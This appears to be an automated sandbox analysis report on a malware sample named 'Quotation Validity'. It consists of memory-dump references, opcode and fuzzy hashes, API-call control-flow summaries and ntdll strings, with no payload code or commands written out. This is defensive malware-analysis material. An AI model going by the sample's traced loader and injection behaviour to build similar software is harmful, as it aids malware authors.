                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9aa3741fec9bced053f763037ff3db7cb4414b333a5d83ca3ad8992c6789c536
                                                                                • Instruction ID: cc19979819cf1bf1387da152289fa0db473671adeff05e859944d42b494eeda5
                                                                                • Opcode Fuzzy Hash: 9aa3741fec9bced053f763037ff3db7cb4414b333a5d83ca3ad8992c6789c536
                                                                                • Instruction Fuzzy Hash: F8614D71A112098FEB49EF7AE84168ABBF2FBC9200F14C129D415AB365EB786805CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1569ce1b3290a0fafa711cca5157780ccb9799092ed9d6af0b4d1146dcba1cf5
                                                                                • Instruction ID: b7532cdf2bdb1d4e9f2eb8d079618ca3b3e9885f6440a7658e586ce65936f76c
                                                                                • Opcode Fuzzy Hash: 1569ce1b3290a0fafa711cca5157780ccb9799092ed9d6af0b4d1146dcba1cf5
                                                                                • Instruction Fuzzy Hash: E0610B71E112098FEB48EF6AE84569ABBF2FBC8200F14C129D415AB365EB786845CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41dcbf9d369ba20844ec2a37b22bb22b44a363c1c09b42cc8fefdbfd49ead7db
                                                                                • Instruction ID: 7756429a3f72ddac09e9f883f431161de21d170e23316825d54c8f9998e73feb
                                                                                • Opcode Fuzzy Hash: 41dcbf9d369ba20844ec2a37b22bb22b44a363c1c09b42cc8fefdbfd49ead7db
                                                                                • Instruction Fuzzy Hash: 0451E8B4E106199FDB14CFA9C5806AEFBF2FF89304F24816AD418A7315D7349942CFA5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8012cb493e8ea0fc04b41fd065c0059816aef780a134bb09b98a2a61a700b7c8
                                                                                • Instruction ID: a3396536c382ef87dc6f320984a6aef4ce68b557e47fb61e633850de8255092e
                                                                                • Opcode Fuzzy Hash: 8012cb493e8ea0fc04b41fd065c0059816aef780a134bb09b98a2a61a700b7c8
                                                                                • Instruction Fuzzy Hash: 995109B0E106198FEB14CFA9D5806AEFBF2FF89314F24816AD418A7315D7359942CFA1

                                                                                Execution Graph

                                                                                Execution Coverage:1.5%
                                                                                Dynamic/Decrypted Code Coverage:5%
                                                                                Signature Coverage:8.6%
                                                                                Total number of Nodes:139
                                                                                Total number of Limit Nodes:9

                                                                                Control-flow Graph

                                                                                control_flow_graph 356 417723-41774c call 42f323 359 417752-417760 call 42f923 356->359 360 41774e-417751 356->360 363 417770-417781 call 42ddc3 359->363 364 417762-41776d call 42fbc3 359->364 369 417783-417797 LdrLoadDll 363->369 370 41779a-41779d 363->370 364->363 369->370
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417795
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                • Instruction ID: c8367a89be375ba73a30cdb688ded44f01425706de2ca614d69ed47fcf1ac29a
                                                                                • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                • Instruction Fuzzy Hash: 49010CB5E00209BBDB10DBE5DC42FDEB7789B54308F4041AAA91897281FA35EB588B95

                                                                                Control-flow Graph

                                                                                control_flow_graph 376 42c663-42c69c call 404783 call 42d8c3 NtClose
                                                                                APIs
                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 390 13b2b60-13b2b6c LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 391 13b2c70-13b2c7c LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: S$l420377x$l420377x
                                                                                • API String ID: 1836367815-2727433438

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 15 413f93-413fc5 call 42e7e3 call 42f1f3 20 413fcb-413ffd call 404733 call 424e23 15->20 21 413fc6 call 417723 15->21 26 41401d-414023 20->26 27 413fff-41400e PostThreadMessageW 20->27 21->20 27->26 28 414010-41401a 27->28 28->26
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: l420377x$l420377x
                                                                                • API String ID: 1836367815-444879537

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 29 413f72-413f79 30 413fb5-413ffd call 417723 call 404733 call 424e23 29->30 31 413f7b-413f87 29->31 38 41401d-414023 30->38 39 413fff-41400e PostThreadMessageW 30->39 39->38 40 414010-41401a 39->40 40->38
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: l420377x$l420377x
                                                                                • API String ID: 1836367815-444879537

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 41 42c9e3-42ca24 call 404783 call 42d8c3 RtlFreeHeap
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CA1F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID: wdA
                                                                                • API String ID: 3298025750-2931128418

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 371 42c993-42c9d4 call 404783 call 42d8c3 RtlAllocateHeap
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(?,0041E4EE,?,?,00000000,?,0041E4EE,?,?,?), ref: 0042C9CF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 381 42ca33-42ca6c call 404783 call 42d8c3 ExitProcess
                                                                                APIs
                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,5B435AB9,?,?,5B435AB9), ref: 0042CA67
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_Quotation Validity.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 386 13b2c0a-13b2c0f 387 13b2c1f-13b2c26 LdrInitializeThunk 386->387 388 13b2c11-13b2c18 386->388
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-2160512332
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                • API String ID: 0-3591852110
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$X,$_LdrpInitialize$h=$minkernel\ntdll\ldrinit.c
                                                                                Strings
                                                                                • @, xrefs: 0136D2AF
                                                                                • @, xrefs: 0136D313
                                                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0136D146
                                                                                • @, xrefs: 0136D0FD
                                                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0136D262
                                                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0136D0CF
                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0136D2C3
                                                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 0136D196
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$X,$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                Strings
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013E02BD
                                                                                • RTL: Re-Waiting, xrefs: 013E031E
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013E02E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                Strings
                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 01395352
                                                                                • Kernel-MUI-Number-Allowed, xrefs: 01395247
                                                                                • Kernel-MUI-Language-SKU, xrefs: 0139542B
                                                                                • WindowsExcludedProcs, xrefs: 0139522A
                                                                                • Kernel-MUI-Language-Allowed, xrefs: 0139527B
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                Strings
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 013A8421
                                                                                • LdrpInitializeProcess, xrefs: 013A8422
                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013A855E
                                                                                • @, xrefs: 013A8591
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                • API String ID: 0-336120773
                                                                                Strings
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 013DA9A2
                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 013DA992
                                                                                • LdrpDynamicShimModule, xrefs: 013DA998
                                                                                • apphelp.dll, xrefs: 01392462
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-176724104
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                • API String ID: 0-1391187441
                                                                                Strings
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 013F2104
                                                                                • LdrpInitializationFailure, xrefs: 013F20FA
                                                                                • Process initialization failed with status 0x%08lx, xrefs: 013F20F3
                                                                                • X,, xrefs: 013F20EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$X,$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-2740999052
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                • API String ID: 0-2779062949
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                • API String ID: 0-373624363
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %$&$@
                                                                                • API String ID: 0-1537733988
                                                                                Strings
                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 013DA589
                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 013DA59A
                                                                                • LdrpCompleteMapModule, xrefs: 013DA590
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                • API String ID: 0-1676968949
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                • API String ID: 0-1151232445
                                                                                Strings
                                                                                • PreferredUILanguages, xrefs: 0142C212
                                                                                • @, xrefs: 0142C1F1
                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0142C1C5
